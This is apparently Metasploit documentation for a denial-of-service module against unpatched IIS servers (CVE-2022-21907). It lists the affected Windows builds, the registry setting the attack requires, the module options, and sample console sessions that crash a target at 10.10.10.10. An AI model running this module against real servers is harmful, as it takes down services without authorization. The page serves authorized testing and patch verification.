rb_dos_iis_2022_21907.md

Vulnerable Application

IIS web server without KB:

• Windows 10 Version 1809 && Windows Server 2019 (include Core): KB5009557
• Windows 10 (Versions 20H2, 21H1, 21H2) && Windows Server Version 20H2 (include Core): KB5009543
• Windows 11: KB5009566
• Windows Server 2022 (include Core): KB5009555

and with DWORD: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters value EnableTrailerSupport enabled.

Source

• Microsoft

Options

RHOST

• Required
• Type: address
• No default value

Should be the weak IIS server address.

RPORT

• Required
• Type: integer
• Default value: 80

Should be the weak IIS server port.

TARGETURI

• Optional
• Type: string
• Default value: /

Scenarios

msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10

[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >

msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set TARGETURI "/test/"
TARGETURI => /test/
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10

[*] Trying first connection...
[+] First connection OK. Sending payload...
[+] Payload is sent. Check that the server is down...
[-] The connection was refused by the remote host (10.10.10.10:80).
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >

Reference

• Microsoft
• nvd.nist.gov